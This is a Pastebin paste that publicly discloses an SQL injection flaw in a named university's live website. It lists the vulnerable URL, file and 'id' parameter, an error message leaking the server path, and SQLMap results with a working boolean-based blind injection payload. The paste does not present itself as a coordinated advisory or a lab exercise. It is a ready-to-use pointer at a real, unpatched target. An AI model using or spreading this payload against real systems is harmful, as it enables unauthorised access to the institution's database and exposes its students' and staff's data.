Advertisement
KingSkrupellos

Bangladesh North Western University SQLMap Results

Apr 24th, 2020
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. Bangladesh North Western University SQL Injection
  2.  
  3. Vulnerable Site :
  4.  
  5. nwu.edu.bd/news_details.php?id=1%27
  6.  
  7. Vulnerable File :
  8.  
  9. /news_details.php
  10.  
  11. Vulnerable Parameter :
  12.  
  13. ?id=
  14.  
  15. SQL Database Error :
  16.  
  17. Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean
  18. given in /home/nwuedu/public_html/news_details.php on line 40
  19.  
  20. SQLMap Results
  21.  
  22. SQLMap identified the following injection point(s) with a total of 331 HTTP(s) requests:
  23. ---
  24. Parameter: id (GET)
  25.  
  26. Type: boolean-based blind
  27. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  28.  
  29. Payload: id=-8541' OR 1978=1978
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement